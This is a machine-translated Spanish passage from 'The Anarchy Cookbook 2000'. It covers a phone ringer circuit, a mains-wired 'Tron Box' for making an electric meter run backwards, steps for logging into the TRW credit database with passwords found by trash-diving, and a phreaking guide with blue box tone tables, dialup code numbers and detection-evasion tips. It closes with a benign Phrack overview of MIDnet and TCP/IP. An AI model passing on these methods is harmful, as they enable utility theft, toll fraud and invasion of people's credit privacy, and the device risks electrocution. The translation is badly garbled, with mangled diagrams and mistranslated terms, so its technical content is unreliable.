______________ | | ^ NC - | - 5 4 - | ----- / \ / \ / -------> G | | / R2G <----) | ---- | - 6 3 - | - Carolina del Norte | C3 | U1 | ------- | - 7 2 - | ----------------> A TIMBRE | | ---- | - 8 1 - | - | | ______________ | | | --- / \ / \ / ---- | (L1 ----- | R1 C1 ------------------------------------------ L2

una. Principal timbre circuito TTL

(> :::::::::::::::::::::::::::::::::::::::::::::::: :::::::: <)

_DE PIN 2 <---------------- | | _ | | -------------> G P1

b. Transductor piezoeléctrico

(> :::::::::::::::::::::::::::::::::::::::::::::::: :::::::: <)

__ / |DE PIN 2 <--------------- | (.. ------- --------- | | / |

Page 139: 106652012 the Anarchy Cookbook 2000 Es

> | | <| S1 | | > | | <- | | | > | | <| | __ | \ | G <---------.> | |. <--- \ | T1 c. Transductor electromagnéticoLista de piezas• U1 - Texas Instruments TCM1506• T1 - 4000:8 ohmios transformador de audio• S1 - altavoz de 8 ohmios• R1 - resistencia 2.2k• R2 - resistencia variable externa, ajusta la frecuencia de tiempo• C1 - condensador de 0.47 uF• C2 - condensador de 0,1 uF• C3 - condensador de 10uF• L1 - Consejo• L2 - Anillo• L1 y L2 son la línea telefónica.

Variación de tipo:Esta es la fórmula para determinar el tipo de cambio:

1 1 SR = --------------------- = ------------ = 6 ¼ Hz (DSR (1/f1) + DSR (1/f2)) 128 128 ---- + ---- 1714 1500

• DSR = Devider Cambio Razón de tasas = 128• f1 = frecuencia de salida de alta = 1714• f2 = frecuencia de salida de baja = 1500

119.The Tron Box por la contracción del Gran Capitán!

------------------ R ---- F ----- I I I I I- (C) (C) (C) I I I- I I -----------------------------

• (C) = condensador• F = fusible• R = resistencia• I, - son de alambre

Lista de piezas:• (3) condensadores electrolíticos nominal de 50 V (más bajo) .47 UF• (1) 20-30 OHM resistencia de ½ Watt• (1) fusible de 120 Voltios (mejor amperaje a utilizar al menos la mitad de la casa

de la corriente total, o incluso menos que le impide volar su interruptor por si acaso ...)

• (1) cable de alimentación (cortar un cable de extensión. ¿Necesitas parte de la clavija y el cable)

Page 140: 106652012 the Anarchy Cookbook 2000 Es

• (1) aislado eléctricamente caja para el resto de nosotros. Si el no se siente cómodo sobre la electricidad, entonces no jugar con esta. No hay presencia de tensión que te matan *** ***.

La cosa funciona cuando la carga en su casa es baja al igual que en la noche. Se pondrá una señal de fase inversa en la línea y cancelar la otra fase y poner una fase inversa corriendo todo en la casa. Bueno, si alguna vez has cambiado los cables de corriente en un D \ C (batería) del motor se verá que se mueve hacia atrás y el tipo de medidor de electricidad funciona de esta manera ... así que la fase reversa hace que el metro reduzca la velocidad y si tienes suerte irá hacia atrás. De todos modos significa un proyecto de ley más barato eléctrica.

120.More TRW Información por The Jolly Roger

TRW es una gran base de datos en la que la empresa y los bancos pueden ejecutar comprobaciones de crédito de sus clientes. Ejemplo: John Jones pedidos por valor de $ 500 de los equipos de música de la distribución electrónica de Joe Blow Co. Bien podría ser que ha dado a la empresa un número de tarjeta de crédito falsa, o no tiene suficiente crédito, etc Bueno, ellos llaman a TRW y luego ejecutar un control de él, TRW a continuación, enumera sus números de tarjetas de Sears (todo a la visa) y le dice a los números, el crédito, cuando perdió por última vez (si alguna vez lo hizo) y luego, por supuesto, dice que si ha tenido algún problema antes de pagar sus cuentas.

También me gustaría añadir que a pesar de TRW contiene información sobre millones de personas, no todas las partes del país se sirve, aunque la mayor área son .. Así que si odias a alguien y vivir en un estado pequeño, probablemente no será capaz de ordenar 300 asientos de inodoro de color rosa de K-mart.

Inicio de sesiónPara iniciar sesión, dial-up a su número de acceso local (o de larga distancia, lo que cada vez que se enciende) y esperar a que se diga "TRW" en este sistema, escriba o bien una "A" o "Ctrl G- "y dirá" la construcción del circuito en curso "se va a esperar por un minuto y después borrar la pantalla, ahora se escribe uno de los siguientes.

TCA1Tca2Tnj1Tga1

Esto es para decirle qué zona geográfica del cliente se encuentra, en realidad no importa que se utiliza, ya que TRW cambiará automáticamente cuando se busca el registro ..

A continuación, escriba en la clav e información sobre la persona que usted está tratando de obtener información de crédito en. Lo escribe en un formato como este:

Rts pswd Lname Fnombre ..., carta de la Casa El primer número de la calle <cr> Postal nombre ahora se escribe ctrl s y 2 Ctrl-Q en este caso es lo que parece en la vida real:

Ae: Marcación xxx-xxx-xxxx

(Pantalla transparente)TRW ^ G

circuito de la construcción en curso

(Pausa ... borrar la pantalla)

TCA1

RTC 3966785-CM5 David Johnson ..., 4567

Page 141: 106652012 the Anarchy Cookbook 2000 Es

R 56785^ S ^ q ^ q

y luego se va a esperar unos segundos e imprimir el archivo en él (si se puede localizar uno para el individuo)

Nota: Puede que tenga que pulsar retorno cuando conecte por primera vez para llamar la atención de sistemas.

Conseguir sus contraseñasPara obtener pswds, que ir a su banco favorito o tienda Sears y cavar a través de la basura (de ahí el nombre de destrozar) en busca de impresiones, si son un lugar lo suficientemente grande, y vive en una zona de TRW, entonces probablemente tendrá algún . Las impresiones que tienen el código de suscriptor de 7 dígitos, dejando el dígito 3-4 pswd depende de usted. Al igual que destrozar abajo en la vieja campana de ma.

121.Phreaker 's Phunhouse por la Jolly Roger

El prequil largamente esperada Guía phreaker por fin ha llegado. Concebido por el aburrimiento y la soledad que sólo se podría derivar de: el viajero! Pero ahora, él ha vuelto con toda su fuerza (después de unas pequeñas vacaciones) y está aquí para los nuevos archivos "Estreno mundial" en todas partes. Mantenga la calma. Esta es la prequil a la primera, así que relájate. Esto no está hecho para ser un exclusivo archivo de Ultra Elite, así que cálmate un poco y ver en el fondo si es demasiado frío para él.

Phreak DiccionarioAquí encontrarás algunos de los términos básicos pero necesarios que deben ser conocidas por cualquier Phreak que quiere ser respetado en absoluto.

Phreak:1. La acción de la utilización de los medios maliciosos e ilegales sobre todo

con el fin de no pagar por algún tipo de proyecto de ley de telecomunicaciones, el orden, la transferencia, u otro servicio. A menudo implica el uso de cajas de alta ilegales y las máquinas con el fin de derrotar a la seguridad de que está configurado para evitar este tipo de suceso. [Fr'eaking]. v

2. Una persona que utiliza los métodos anteriores de la destrucción y el caos con el fin de lograr una vida mejor para todos. Un phreaker verdad no van en contra de sus compañeros o narco en las personas que tienen desigual en él o hacer algo llamado a ser deshonroso phreaks. [Fr'eek]. n.

3. Un cierto código o dialup útil en la acción de ser un Phreak. (Ejemplo: "Me cortó un Phreak nuevo metro ayer por la noche.")

Sistema de conmutación: 1. Hay 3 principales sistemas de conmutación empleados actualmente en los

EE.UU., y unos pocos otros sistemas se ha mencionado como telón de fondo.• SxS: Este sistema fue inventado en 1918 y ha sido utilizada en más de

la mitad del país hasta 1978. Es un sistema muy básico que es una pérdida general de energía y trabajo duro en el juez de línea. Una buena manera de identificar a esto es que se requiere de una moneda en la cabina antes de que se le dará un tono de marcado, o que no haya ninguna llamada en espera, reenvío de llamadas, o cualquier servicio en cualquier otro disponible. Significa: paso a paso

• RE: Este sistema de conmutación fue empleado por primera vez en 1978 con el fin de hacerse cargo de la mayor parte de las faltas de SxS de conmutación. No sólo es más eficiente, sino que también puede soportar diferentes servicios en diversas formas. XB1 es la versión Crossbar 1. Eso es muy limitado y es difícil de distinguir de las tarjetas SxS, excepto por la visión directa de los cables en cuestión. El siguiente fue XB4, Versión 4 travesaño. Con este sistema, algunas de las cosas

Page 142: 106652012 the Anarchy Cookbook 2000 Es

básicas como DTMF que no estaban disponibles con SxS se puede lograr. Para la carrera final de RE, XB5 fue creado. Este es un servicio que puede permitir que la mayoría de los tonos DTMF, más de 800 servicios de tipo (que no siempre estaban disponibles.) Es sinónimo de: travesaño.

• ESS: Una pesadilla en las telecomunicaciones. En colores vivos, ESS es una cosa bastante malo tener que hacer frente a. Es muy sencillo de identificar. Marcando el 911 para emergencias, y ANI [véase a continuación ANI] son las facetas más comunes del sistema de terror. ESS tiene la capacidad de la lista en el registro de llamadas de una persona ¿qué número se llama, ¿cuánto tiempo se hizo la llamada, e incluso el estado de la conversación (módem o de otra manera.) Desde ESS ha estado empleado, que ha sido hace muy poco, ha ido a través de muchos tipos de revisiones. La última versión del sistema hasta la fecha es 11 bis del SEE, que se emplea en Washington DC por razones de seguridad. ESS es realmente un problema para cualquier Phreak, porque es más "inteligente" que los otros sistemas. Por ejemplo, si en su registro de llamadas que vieron 50 llamadas al 1-800-421-9438, que sería capaz de hacer un CN / A [ver Lagunas abajo] en su número y determinar si usted está suscrito a ese servicio o no . Esto hace que más llama un peligro, porque a pesar de los números 800 parecen ser libre, que se registran en el registro de llamadas y luego a la derecha antes de recibir su factura borra las facturas para ellos. Pero antes de que la están abiertos a la inspección, la cual es una razón por el uso prolongado de cualquier código es peligroso en ESS. Algunas de las cajas [ver boxeo abajo] son incapaces de funcionar en el SEE. En general, es una amenaza para la Phreak verdad. Significa: Sistema de conmutación electrónica. Debido a que podría aparecer en un filtro de algún lugar o tal vez es sólo bueno hacerles saber de todos modos.

• SSS: Sistema de Conmutación de Strowger. En primer lugar no dispone de operador del sistema.

• WES: San Electrónica de conmutación. Se utiliza cerca de 40 años, con algunos lugares de menor importancia en el oeste.

Boxeo: 1. El uso de cajas diseñado personalmente que emiten impulsos electrónicos o

cancelación que le permiten actuar al mismo tiempo más simple phreaking. Mediante el uso de cajas separadas, usted puede lograr casi todas las acciones posibles, con o sin el control de un operador.

2. Algunas cajas y sus funciones se enumeran a continuación. Los marcados con '*' indican que no son operatable en ESS.

• * Caja Negro: hace parecer a la compañía telefónica que el teléfono nunca fue detenido.

• Blue Box: Emite un tono de 2600Hz que te permite hacer cosas tales como la pila de una línea troncal, patear el operador fuera de línea, y otros.

• Red Box: Simula el ruido de un cuarto, el níquel, o moneda de diez centavos que se dejó caer en un teléfono público.

• Caja de queso: Convierte tu teléfono de su casa en un teléfono público para deshacerse de las huellas (una caja de color rojo por lo general se necesitan con el fin de llamar.)

• * Caja clara: Te da un tono de marcado en algunos de los teléfonos públicos SxS antiguos sin poner en una moneda.

• Beige de la caja: Un simple juez de línea producida teléfono que le permite aprovechar las líneas de teléfono y extraer por espionaje, o los cables que cruzan, etc

• Purple Box: Hace que todas las llamadas realizadas desde su casa parecen ser las llamadas locales.

ANI [ANI]:

Page 143: 106652012 the Anarchy Cookbook 2000 Es

1. Identificación automática del número. Un servicio disponible en ESS que permite un servicio de telefonía [ver dialups abajo] para registrar el número que cualquier cierto código se marcó desde junto con el número que se llamaba e imprimir tanto de éstos en la factura del cliente.

2. dialups [ver dialups abajo] están diseñados sólo para usar ANI. Algunos de los servicios no tienen el equipo adecuado para leer los impulsos ANI todavía, pero es imposible saber qué es lo que, sin ser roto o no roto en primer lugar.

Dialups [dy'l'ups]: 1. Cualquier toma de locales extendidas o 800 que permite el acceso instantáneo

a cualquier servicio, tales como MCI, Sprint o AT & T, que a partir de ahí puede ser utilizado por la recolección manual o utilizando un programa para revelar los códigos de otras personas que luego pueden ser utilizadas moderadamente hasta que se enteran al respecto y debe cambiar a otro código (de preferencia antes de que se enteren.)

2. Dialups son muy comunes en ambos sentidos. Algunos dialups revelan la empresa que los opera tan pronto como se escucha el tono. Otros son mucho más difíciles y algunos puede que nunca será capaz de identificar. Una pequeña lista de conexiones por llamada:

1-800-421-9438 (5 cifras)1-800-547-6754 (6 cifras)1-800-345-0008 (6 cifras)1-800-734-3478 (6 cifras)1-800-222-2255 (5 cifras)

3. Códigos: Los códigos son muy fáciles de acceder a los procedimientos cuando se llama a una conexión telefónica. Ellos le darán algún tipo de tono. Si el tono no se agota en 3 segundos, luego pinchar en el código e inmediatamente después del código, el número al que llama, sino lograr un '1 'en el principio, en primer lugar. Si el tono termina, luego pinchar en el código cuando el tono termina. Entonces, se le dará otro tono. Golpe en el número que está marcando, o un '9 '. Si un puñetazo en un '9 'y de las paradas de tono, y luego te haces un lío un poco. Si un puñetazo en un tono y continúa el tono, entonces sólo tiene que marcar el número al que está llamando sin el '1 '.

4. Todos los códigos no son universales. El único tipo que conozco que es verdaderamente universal es Metrophone. Casi cada ciudad importante tiene una conexión telefónica de metro local (por Filadelfia, (215) 351-0100/0126) y dado que los códigos son universales, casi todos los Phreak ha utilizado una o dos veces. Ellos no emplean ANI en los puntos de venta, que yo sepa, así que siéntase libre para ver a través de sus libros y llamar a 555-1212 o, como una casa de más tortuoso, suscríbase usted mismo. Entonces, nunca utilice su propio código. De esta manera, si se comprueba para arriba en usted debido a su registro de llamadas, que usualmente se puede encontrar que usted está suscrito. No sólo eso, sino que podría sentar un hacker Phreak alrededor de esa zona y dejar que se hachazos, ya que suelen agruparlos, y, como un bono, usted tendrá acceso telefónico a su local.

5. 950 de. Parece como un sueño phreakers perfectamente fresco. Ellos son libres de su casa, desde teléfonos públicos, de todas partes, y sede de todas las compañías de larga distancia más importantes (950) 1044 <MCI>, (950) 1077 <Sprint>, 950-1088 <S+ylines>, 950 - 1033 Telecom> <US.) Bueno, no lo son. Fueron diseñados para ANI. Ese es el punto, final de la discusión.

Un diccionario de phreak. Si te acuerdas de todas las cosas contenidas en ese archivo hasta allí, usted puede tener una mejor oportunidad de hacer lo que sea que hagas. La siguiente sección es quizás un poco más interesante ...

Los planes del compartimento azul:Estos son algunos de los planes de la caja azul, pero en primer lugar, se advirtió, no ha habido detectores de tono 2600Hz a cabo en las líneas troncales de operador ya XB4. La idea detrás de esto es utilizar un tono de 2600Hz en unas pocas funciones muy traviesos que realmente pueden hacer que su día aligerar. Pero primero, aquí están los planes, o el corazón del archivo:

Page 144: 106652012 the Anarchy Cookbook 2000 Es

700: 1: 2: 4: 7: 11:900: +: 3: 5: 8: 12:1100: +: +: 6: 9: Protocolo de Kioto:1300: +: +: +: 10: KP2:1500: +: +: +: +: ST: : 700: 900: 1100: 1300: 1500:

¡Detente! Antes de comenzar a recomponer los usuarios intransigente esos chismes de tono poco juntos, no hay un método más sencillo. Si tienes un Apple-gato con un programa como el maullido del gato de IV, a continuación, usted puede generar los tonos necesarios, el tono de 2600Hz, el tono, el tono PK KP2, y el tono del ST a través de la sección de acceso telefónico. Así que si tienes que voy a asumir que se puede arrancar y funciona, y te hacen el favor de decirle a usted ya los demás usuarios qué hacer con la caja azul ya que de alguna manera se construye. La conexión a un operador es una de las formas más conocidas y utilizadas de divertirse con su caja azul. Usted sólo tiene que marcar un TSPS (estación de servicios de tráfico de posicionamiento, o el operador que se obtiene al marcar el '0 ') y hará sonar un tono de 2600Hz a través de la línea. ¡Cuidado! No usar este directo! Después de haber hecho eso, es muy sencillo tener diversión con ella. Sopla un tono de PK para iniciar una llamada, un tono de ST para detenerlo, y un tono de 2600Hz para colgar. Una vez que haya conectado a ella, aquí están algunos números para llamar a la diversión con ella:

Teleconferencia 0-700-456-1000 (gratis, porque usted es el operador!) (Código de área) -101 Línea de conmutación (Código de área) -121 del operador local (jeje) (Código de área) -131 información (Código de área) -141 Tasa de carreteras y (Código de área) -181 Moneda Operador reembolso (Código de área) -11511 Conferencia operador (al marcar 800-544-6363)

Bueno, esos eran los controladores de la matriz de tonos para el cuadro azul y algunas otras cosas útiles que le ayudarán a comenzar con. Pero ésas son sólo las funciones con el operador. Hay otras divertidas k-cosas que puedes hacer con él.

Cosas Blue Box más avanzado:Lo sentimos. Pequeño error ahí. Me olvidé de longitudes de tono. Um, soplar un par de tonos a cabo durante un máximo de 1/10 de un segundo con otro 1/10 segundos de silencio entre los dígitos. Tonos del Protocolo de Kioto debe ser enviado para 2/10 de segundo. Una manera de confundir a las trampas de 2600Hz es enviar ruido rosa a través del canal (para todos los que tienen ecualizadores decentes BSR, no es el ruido rosa importante en ese país.)

Uso de las funciones de operador es el uso de la línea 'hacia adentro' tronco. Eso es trabajar desde el interior. Desde el «exterior» del tronco, se pueden hacer cosas tales como hacer llamadas de emergencia innovadoras, aprovechar las líneas, ocupado todas las líneas en cualquier tronco (llamado 'apilamiento'), activar o desactivar la del TSP, y para algunos sistemas 4a puede incluso volver a enrutar las llamadas a cualquier lugar.

Está bien. La única cosa que todas las guías Phreak completa debe entenderse sin planes es la caja azul, ya que una vez fueron una parte vital de phreaking. Otra cosa que las necesidades de cada archivo completo es una lista completa de todos los números 800 de todo para que usted pueda divertirse un poco más.

Listados / 800 Marcación / - / - /

1-800-345-0008 (6) 1-800-547-6754 (6)1-800-245-4890 (4) 1-800-327-9136 (4)1-800-526-5305 (8) 1-800-858-9000 (3)1-800-437-9895 (7) 1-800-245-7508 (5)1-800-343-1844 (4) 1-800-322-1415 (6)1-800-437-3478 (6) 1-800-325-7222 (6)

Page 145: 106652012 the Anarchy Cookbook 2000 Es

Muy bien, Hacker 1.0 Cat conjunto de los números y tiene una cogida de un día. Eso es suficiente con 800 códigos, por el momento este turno de poner no sé en qué estado están esos códigos será, pero tratar a todos fuera de todos modos y ver lo que hay. En unos 800 servicios de ahora, que tiene un operador que responderá y le pedirá su código, y luego su nombre. Algunos alternar entre la voz y el tono de la verificación, usted nunca puede estar completamente seguro de que será en contra.

Armado con este conocimiento se debe tener un tiempo de phreaking bastante bien ahora. Pero la clase no ha terminado todavía, aún hay un par de reglas importantes que usted debe saber. Si escucha clic continua en la línea, entonces usted debe asumir que un operador está jugando con algo, tal vez incluso escuchar en ti. Es una buena idea llamar a alguien de vuelta cuando el teléfono empieza a hacer eso. Si se utiliza un código, utilice un código diferente y / o servicio que le devuelva la llamada.

Una buena manera de detectar si un código está en mal estado o no es para escuchar cuando el número se ha marcado. Si el código es malo es probable que escuche el timbre del teléfono con mayor claridad y más rápidamente que si estuviera utilizando un código diferente. Si alguien contesta a la voz entonces que de inmediato se puede suponer que se trata de un operativo para cualquier compañía que esté utilizando. El famoso '311311 'código de Metro es uno de esos. Usted tendría que ser muy estúpido para responder en realidad, porque cualquiera que te pregunte por el operador siempre va a decir "No está en este momento, puedo hacer que él te devuelva la llamada? y luego se le pedirá su nombre y número de teléfono. Algunas de las empresas más sofisticadas en realidad le dará un soporte en una línea que se supone que le dará un soporte y luego simplemente tener un flujo de basura a través de la pantalla como lo haría con una mala conexión. Es un débil esfuerzo para hacer que usted piensa que el código todavía está trabajando y tal vez que marque la voz de alguien, una buena prueba para el truco compañía es marcar un número que le dará una compañía que nunca ha marcado con ese código antes, que le permitirá determinar si el código es bueno o no. Para la próxima sección, una mirada más clara en algunas de las cosas que un Phreak no se debe prescindir. Un vocabulario.

Hace unos meses, era un mundo muy extraño para la gente de módem por ahí. Pero ahora, el vocabulario de un phreaker es esencial si quieres causar una buena impresión en la gente al publicar lo que sabe sobre ciertos temas.

/ - / Vocabulario / - /

- No escribir mal, salvo algunas excepciones:

teléfono -> fone Freak -> Phreak

- Nunca sustituya "z para 's de. (Es decir, codez -> códigos)

- Nunca deje a muchos personajes después de un mensaje (es decir, hey dudes # @ # @ # @!!)

- NUNCA use la 'k' prefijo (k-kool, K-Rad, k-lo que sea)

- No abrevie. (Tengo mercancías lotsa w / docs)

- Nunca sustituya '0 'para' o '(r0dent, l0zer).

- Olvídate de vosotros mayúsculas de edad, se ve ruggyish.

Muy bien, eso era para aliviar la tensión de lo que se está perforando en sus mentes en este momento. Ahora, sin embargo, de vuelta al curso de enseñanza. Aquí hay algunas cosas que usted debe saber sobre los teléfonos y la facturación de los teléfonos, etc

LATA: Transferencia de acceso de área local. Algunas personas que viven en las grandes ciudades o zonas pueden ser afectado por este problema. Por ejemplo, digamos que usted vive en el código de área 215 en el prefijo 542 (Ambler, Fort Washington). Si usted fue

Page 146: 106652012 the Anarchy Cookbook 2000 Es

a marcar un código de Metro de base de esa zona, por ejemplo, 351-0100, que podría no contar con llamadas locales ilimitadas, ya que está fuera de su LATA. Para algunos de LATA, tiene que marcar un '1 ', sin el código de área antes de marcar el número telefónico. Esto podría ser una molestia para todos nosotros, si no te diste cuenta que se facturará por ese tipo de llamada. De esa manera, a veces, es mejor prevenir que curar y Phreak.

El Registro de llamadas: En las regiones del SEE, para todos los hogares alrededor, la compañía telefónica tiene algo que llama un registro de llamadas. Esto demuestra que cada número único que ha marcado, y las cosas se pueden arreglar por lo que mostró cada número que estaba llamando a ti. Esa es una desventaja principal de la ESS, es sobre todo un ordenador para un análisis de serie se puede hacer igual que con bastante facilidad. El uso de un acceso telefónico es una manera fácil de tornillo que, y es algo digno de recordar. De todas formas, con el registro de llamadas, que comprobar y ver lo que usted marcó. Hmm ... que ha marcado 15 diferentes números 800 de ese mes. Pronto se encuentran con que usted está suscrito a ninguna de estas empresas. Pero eso no es lo único. La mayoría de la gente se imagina "¡Pero espera! 800 números no aparecen en mi factura de teléfono!". Para esas personas, es un pensamiento agradable, pero los números 800 son recogidos en el registro de llamadas hasta el momento de que son enviados a usted. Así se puede comprobar hasta en usted antes de que se lo enviará y se tenga en cuenta el hecho de que jodido algo y llamó a una de más de 800 líneas.

En este momento, después de todo esto, usted debe tener una idea bastante buena de cómo crecer como Phreak buena. Siga estas pautas, no mostrar, y no tomar riesgos innecesarios cuando phreaking o piratería.

122.Phrack Magazine - vol. 3, Número 27 por Knight Lightning

PrólogoSi usted no está familiarizado con NSFnet, le sugiero que lea: "Fronteras" (Phrack Inc., volumen dos, número 24, del archivo 4 de 13), y, definitivamente, "NSFnet: National Science Foundation Network" (Phrack Inc. ., el tercer volumen, número 26, del archivo 4 de 11).

IntroducciónMIDNET es una red informática regional que es parte de la NSFnet, el NationalLa Fundación Científica de la red. Actualmente, once mediados de los Estados Unidos universidadesestán conectados entre sí y con el NSFnet través MIDnet:

UA - Universidad de Arkansas en FayettevilleISU - Universidad Estatal de Iowa en AmesIU - Universidad de Iowa en Iowa CityKSU - Universidad Estatal de Kansas en ManhattanKU - Universidad de Kansas en LawrenceUMC - Universidad de Missouri en ColumbiaWU - Universidad de Washington en St. Louis, MissouriUNL - Universidad de Nebraska en LincolnOSU - Universidad Estatal de Oklahoma en StillwaterUT - Universidad de Tulsa (Oklahoma)OU - Universidad de Oklahoma en Norman

Los investigadores de cualquiera de estas universidades que han financiado becas pueden acceder a laseis centros de supercomputación financiados por la NSF:

John Von Neuman Centro de SupercomputaciónCentro Nacional de Investigación AtmosféricaCornell Fondo Nacional de SupercomputaciónCentro Nacional para Aplicaciones de SupercomputaciónPittsburgh Supercomputing CenterSan Diego Supercomputing Center

Page 147: 106652012 the Anarchy Cookbook 2000 Es

Además, los investigadores y científicos se puedan comunicar entre sí a través de una red de ordenadores en todo el vasto mundo que incluye la NSFnet, ARPANET, CSNET, BITNET, y otros que usted ha leído acerca de la saga Trascendente futuro. Por favor, consulte la sección "Fronteras" (Phrack Inc., volumen dos, número 24, del archivo 4 de 13) para más detalles.

MIDnet es sólo una de varias redes informáticas regionales que componen el sistema NSFnet. A pesar de todas estas redes informáticas regionales funcionan de la misma, MIDnet es el único que tiene acceso directo a lo que este archivo está escrito desde un punto de vista MIDnet. Para las personas que tienen acceso a las otras redes regionales de NSFNET, las únicas diferencias reales que aparecen en este archivo que no se aplicaría a las redes regionales están las universidades que son atendidas por MIDnet en lugar de:

NYSERNet en el Estado de Nueva YorkInterNIC en el sureste de Estados UnidosSEQSUInet en TexasBARRNet en el área de San FranciscoMÉRITO en Michigan

(Hay otros que están siendo construidas.)

Estas redes regionales de todo el gancho en la columna vertebral NSFNET, que es una red que conecta los seis centros de supercomputación. Por ejemplo, una persona en la Universidad Estatal de Kansas se puede conectar con una computadora a través de MIDnet y la columna vertebral NSFNET. Que el investigador también puede enviar un correo a sus colegas de la Universidad de Delaware con MIDnet, NSFNET y InterNIC. Cada universidad tiene su propia red de equipo local que conecta las computadoras en el campus, así como proporcionar un medio para conectarse a una red regional.

Algunas universidades ya están conectados a las redes más antiguas, como CSNET, ARPAnet y BITNET. En principio, cualquier campus conectado a cualquiera de estas redes pueden tener acceso a cualquier persona en cualquier otra red, ya que hay pasarelas entre las redes.

Las pasarelas son computadoras especializadas que el tráfico de red hacia adelante, con lo que las redes de conexión. En la práctica, estas redes de área amplia utiliza la tecnología de redes diferentes, que hacen que sea imposible proporcionar la funcionalidad completa a través de las pasarelas. Sin embargo, el correo se admite casi universalmente en todas las pasarelas, por lo que una persona en un sitio de Bitnet puede enviar mensajes de correo electrónico a un colega en un sitio de ARPAnet (o en cualquier otro lugar para esa materia). Usted ya debe estar algo familiarizado con esto, pero si no se refiere a: "el limbo hasta el infinito" (Phrack Inc., volumen dos, número 24, del archivo 3 de 13) y "Dominios de Internet" (Phrack Inc., el tercer volumen, número 26, el 8 de 11)

Las redes de ordenadores se basan en hardware y software que permiten a las computadoras para comunicarse. El lenguaje que permite la comunicación de red se denomina protocolo. Hay muchos protocolos diferentes en uso hoy en día. MIDnet utiliza los protocolos TCP / IP, también conocida como el Departamento de Defensa Suite (Departamento de Defensa) del Protocolo.

Otras redes que utilizan TCP / IP incluyen ARPANET, CSNET y el NSFnet. De hecho, todas las redes regionales que están vinculados a la columna vertebral NSFNET están obligados a utilizar TCP / IP. En el nivel local del plantel, TCP / IP se utiliza a menudo, aunque otros protocolos como SNA de IBM y DECnet diciembre son comunes. Con el fin de comunicarse con un ordenador a través de la MIDnet y NSFnet, una computadora en un campus debe utilizar TCP / IP directa o usar una puerta de enlace que se traducirá en los protocolos TCP / IP.

El Internet es una red de ordenadores en todo el mundo que es el conglomerado de la mayoría de las grandes redes de área de ancho, incluyendo ARPANET, CSNET, NSFnet, y las regionales, tales como MIDnet. En menor medida, otras redes, como Bitnet que pueden

Page 148: 106652012 the Anarchy Cookbook 2000 Es

enviar correo a los servidores de estas redes se incluyen como parte de la Internet. Esta enorme red de redes, la Internet, ya que por ahora han leído todo sobre en las páginas de Phrack Inc., es una entidad de rápido crecimiento y muy compleja que permite la comunicación sofisticada entre los científicos, estudiantes, funcionarios gubernamentales y otros. Ser parte de esta comunidad es a la vez emocionante y desafiante.

En este capítulo de la saga de futuro trascendente ofrece una descripción general de los protocolos y el software utilizados en MIDnet y NSFNet el. Un análisis de varias de las herramientas de las redes más utilizadas también se incluye para que pueda hacer un uso práctico de la red tan pronto como sea posible.

El Departamento de Defensa Protocol SuiteEl Departamento de Defensa Protocolo Suite incluye muchos protocolos diferentes. Cada protocolo es una especificación de cómo la comunicación es que se produzca entre ordenadores. El hardware y software utilizan el protocolo para crear programas y el hardware a veces especializados con el fin de implementar la función de la red prevista por el protocolo. Implementaciones diferentes del mismo protocolo existen para el hardware y sistemas operativos variados que se encuentran en una red.

Los tres más comúnmente utilizados son funciones de la red:

Mail - Enviar y recibir mensajesTransferencia de archivos - Envío y recepción de archivosConexión remota - Inicio de sesión en un ordenador a distancia

De éstos, el correo es probablemente el más utilizado.

En el mundo TCP / IP, hay tres protocolos diferentes que se dan cuenta de estosfunciones:

SMTP - (Simple Mail Transfer Protocol) E-mailFTP - (File Transfer Protocol) el envío y recepción de archivosTelnet - Inicio de sesión remoto

Como utilizar estos protocolos se discute en la sección siguiente. A primera vista, no es obvio por qué estas tres funciones son las más comunes. Después de todo, el correo y la transferencia de archivos parecen ser la misma cosa. Sin embargo, los mensajes de correo no son idénticos a los archivos, ya que están compuestos generalmente por sólo caracteres ASCII y son secuenciales en su estructura. Los archivos pueden contener datos binarios y tienen complicadas estructuras no secuenciales. Además, los mensajes de correo por lo general pueden tolerar algunos errores en la transmisión, mientras que los archivos no deben contener ningún error. Por último, las transferencias de archivos por lo general se producen en un entorno seguro (es decir, los usuarios que se transfieren los archivos conocen los nombres y las contraseñas y se les permite transferir el archivo, mientras que el correo puede ser enviado a cualquier persona, siempre y cuando su nombre se conoce).

Mientras que el correo y la transferencia de perfeccionar la transferencia de información en bruto de un ordenador a otro, Telnet permite a un usuario remoto para procesar esa información, ya sea conectándose a un ordenador remoto o mediante la vinculación a otro terminal. Telnet es el más usado para iniciar sesión remotamente en un ordenador a distancia, pero en realidad es un protocolo de uso general de comunicaciones. Me ha parecido increíblemente útil durante el último año. En cierto modo, podría ser utilizado para una gran cantidad de acceso, ya que puede conectarse directamente a otro ordenador en cualquier lugar que ha de TCP / IP, sin embargo tenga en cuenta que Telnet * NO * es Telenet. Hay otras funciones que proporcionan algunas redes, incluyendo las siguientes:

• Nombre de traducción de direcciones de redes, equipos y personas• El tiempo actual• La frase del día o de la fortuna• Impresión en una impresora remota, o uso de cualquier otro periférico a distancia

Page 149: 106652012 the Anarchy Cookbook 2000 Es

• Presentación de trabajos por lotes para no interactivo de ejecución• Diálogos y conferencias entre varios usuarios• Llamada a procedimiento remoto (es decir, distribución de la ejecución del programa

en varios equipos remotos)• La transmisión de información de voz o de vídeo

Algunas de estas funciones se encuentran todavía en etapas experimentales y necesitan más rápidas redes de computadoras que existen en la actualidad. En el futuro, nuevas funciones, sin duda, se inventó y mejorar los ya existentes.

El Departamento de Defensa Protocolo Suite es una arquitectura de red por capas, lo que significa que las funciones de red se llevan a cabo por los diferentes programas que funcionan de forma independiente y en armonía unos con otros. No sólo hay diferentes programas, pero hay diferentes protocolos. El SMTP protocolos, FTP y Telnet se ha descrito anteriormente. Protocolos se han definido para obtener la hora actual, la cita del día, y para traducir los nombres. Estos protocolos se llaman protocolos de aplicaciones ya que los usuarios interactúan directamente con los programas que implementan estos protocolos.

El Transmission Control Protocol, TCP, es utilizado por muchos de los protocolos de aplicación. Los usuarios casi nunca interactúan con TCP directamente. TCP establece un fiable de extremo a extremo de conexión entre dos procesos en equipos remotos. Los datos se envían a través de una red en pequeños trozos llamados paquetes para mejorar la fiabilidad y el rendimiento. TCP garantiza que los paquetes llegan en orden y sin errores. Si un paquete tiene errores, TCP pide que el paquete de ser retransmitidos.

A su vez, el TCP insta a IP, Internet Protocol, para mover los datos desde una red a otra. IP todavía no es la capa más baja de la arquitectura, ya que por lo general hay un "enlace de datos de protocolo de capa de" por debajo de ella. Este puede ser cualquiera de un número de protocolos diferentes, dos muy comunes son X.25 y Ethernet.

